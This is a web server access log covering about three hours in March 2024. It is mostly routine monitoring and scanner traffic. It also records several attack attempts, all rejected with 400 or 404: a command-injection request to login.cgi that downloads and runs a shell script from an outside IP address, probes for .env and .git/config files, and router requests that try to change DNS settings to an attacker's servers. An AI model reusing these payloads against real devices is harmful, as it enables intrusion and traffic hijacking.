212.91.246.72 - - [06/Mar/2024:22:42:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:43:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:44:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:45:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.156.66.125 - - [06/Mar/2024:22:46:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [06/Mar/2024:22:46:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.59.230 - - [06/Mar/2024:22:47:04 +0100] "\x16\x03\x01\x01\xc0\x01" 501 321 "-" "-"
212.91.246.72 - - [06/Mar/2024:22:47:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:48:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:49:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:50:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.204 - - [06/Mar/2024:22:51:02 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [06/Mar/2024:22:51:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:52:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:53:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:54:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:55:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:56:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:57:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.24.28 - - [06/Mar/2024:22:58:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Mar/2024:22:58:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:22:59:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.58 - - [06/Mar/2024:22:59:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.118.53.58 - - [06/Mar/2024:22:59:59 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [06/Mar/2024:23:00:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.160.233 - - [06/Mar/2024:23:01:10 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
212.91.246.72 - - [06/Mar/2024:23:01:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
190.61.46.174 - - [06/Mar/2024:23:02:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [06/Mar/2024:23:02:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.168.106.25 - - [06/Mar/2024:23:03:47 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://164.155.205.6/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "hacked-by-matrix"
212.91.246.72 - - [06/Mar/2024:23:03:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:04:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.165.169.131 - - [06/Mar/2024:23:04:54 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
212.91.246.72 - - [06/Mar/2024:23:05:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.41 - - [06/Mar/2024:23:06:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.41 - - [06/Mar/2024:23:06:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [06/Mar/2024:23:06:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:07:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:08:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:09:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:10:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:11:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:12:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:13:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.128.232.191 - - [06/Mar/2024:23:14:00 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Mar/2024:23:14:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.105 - - [06/Mar/2024:23:15:46 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.105 - - [06/Mar/2024:23:15:46 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [06/Mar/2024:23:15:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.42.209 - - [06/Mar/2024:23:16:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Mar/2024:23:16:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:17:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:18:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:19:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.18 - - [06/Mar/2024:23:20:44 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [06/Mar/2024:23:20:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:21:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:22:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:23:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:24:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:25:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:26:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.84 - - [06/Mar/2024:23:26:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.246.72 - - [06/Mar/2024:23:27:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:28:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:29:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:30:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:31:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:32:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:33:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:34:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:35:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:36:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:37:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:38:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.165.169.131 - - [06/Mar/2024:23:39:19 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
45.128.232.191 - - [06/Mar/2024:23:39:44 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Mar/2024:23:39:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:40:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:41:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:42:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.42.209 - - [06/Mar/2024:23:43:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Mar/2024:23:43:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:44:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:45:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:46:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:47:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:48:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:49:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:51:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:52:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:53:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.55.196.199 - - [06/Mar/2024:23:53:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
212.91.246.72 - - [06/Mar/2024:23:54:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:55:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.42.209 - - [06/Mar/2024:23:55:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [06/Mar/2024:23:56:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:57:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:58:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Mar/2024:23:59:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [06/Mar/2024:23:59:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [06/Mar/2024:23:59:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [07/Mar/2024:00:00:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.165.190.17 - - [07/Mar/2024:00:00:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.165.190.17 - - [07/Mar/2024:00:00:59 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.165.190.17 - - [07/Mar/2024:00:01:00 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.165.190.17 - - [07/Mar/2024:00:01:00 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.165.190.17 - - [07/Mar/2024:00:01:00 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
79.124.59.230 - - [07/Mar/2024:00:01:21 +0100] "\x16\x03\x01\x01\xc0\x01" 501 321 "-" "-"
209.141.42.209 - - [07/Mar/2024:00:02:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:00:02:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:00:02:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:00:09:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [07/Mar/2024:00:12:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:00:17:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [07/Mar/2024:00:18:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [07/Mar/2024:00:20:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:00:20:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
103.183.121.244 - - [07/Mar/2024:00:20:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
45.55.196.199 - - [07/Mar/2024:00:21:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
45.55.196.199 - - [07/Mar/2024:00:21:03 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.87/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
185.191.126.213 - - [07/Mar/2024:00:24:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
170.64.201.55 - - [07/Mar/2024:00:28:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
170.64.201.55 - - [07/Mar/2024:00:28:04 +0100] "\x16\x03\x01" 501 318 "-" "-"
170.64.201.55 - - [07/Mar/2024:00:28:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.201.55 - - [07/Mar/2024:00:28:05 +0100] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
170.64.201.55 - - [07/Mar/2024:00:28:06 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
170.64.201.55 - - [07/Mar/2024:00:28:06 +0100] "\x16\x03\x01" 501 318 "-" "-"
170.64.201.55 - - [07/Mar/2024:00:28:07 +0100] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.201.55 - - [07/Mar/2024:00:28:07 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.201.55 - - [07/Mar/2024:00:28:08 +0100] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.201.55 - - [07/Mar/2024:00:28:09 +0100] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.201.55 - - [07/Mar/2024:00:28:09 +0100] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.201.55 - - [07/Mar/2024:00:28:10 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.201.55 - - [07/Mar/2024:00:28:10 +0100] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.201.55 - - [07/Mar/2024:00:28:11 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
119.28.156.200 - - [07/Mar/2024:00:32:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
146.19.24.28 - - [07/Mar/2024:00:33:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [07/Mar/2024:00:35:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:00:36:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [07/Mar/2024:00:46:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.166 - - [07/Mar/2024:00:50:39 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
134.236.3.99 - - [07/Mar/2024:00:55:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
103.183.121.244 - - [07/Mar/2024:01:01:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
177.84.90.0 - - [07/Mar/2024:01:01:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.165.169.131 - - [07/Mar/2024:01:02:42 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
198.235.24.211 - - [07/Mar/2024:01:05:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.211 - - [07/Mar/2024:01:05:53 +0100] "\x16\x03\x01" 501 318 "-" "-"
91.92.244.223 - - [07/Mar/2024:01:12:01 +0100] "GET /core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
142.4.218.114 - - [07/Mar/2024:01:12:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
167.94.146.56 - - [07/Mar/2024:01:16:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.56 - - [07/Mar/2024:01:17:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.56 - - [07/Mar/2024:01:17:03 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.56 - - [07/Mar/2024:01:17:03 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.128.232.191 - - [07/Mar/2024:01:18:39 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.128.232.191 - - [07/Mar/2024:01:19:51 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
103.183.121.244 - - [07/Mar/2024:01:25:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
213.32.39.40 - - [07/Mar/2024:01:32:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
209.141.42.209 - - [07/Mar/2024:01:32:21 +0100] "GET /dnscfg.cgi?dnsPrimary=91.202.5.121&dnsSecondary=91.202.5.120&dnsDynamic=0&dnsRefresh=1&dnsIfcsList= HTTP/1.1" 404 315 "http://212.91.246.86:80" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:01:32:21 +0100] "GET /userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.0.100&ip2=192.168.0.199&Lease=120&domain=&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 333 "http://212.91.246.86:80/userRpm/LanDhcpServerRpm.htm" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
209.141.42.209 - - [07/Mar/2024:01:32:21 +0100] "GET /userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver=91.202.5.121&dnsserver2=91.202.5.120&Save=Save HTTP/1.1" 404 335 "http://212.91.246.86:80/userRpm/WanDynamicIpCfgRpm.htm?wan=0" "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0 X-Middleton/1"
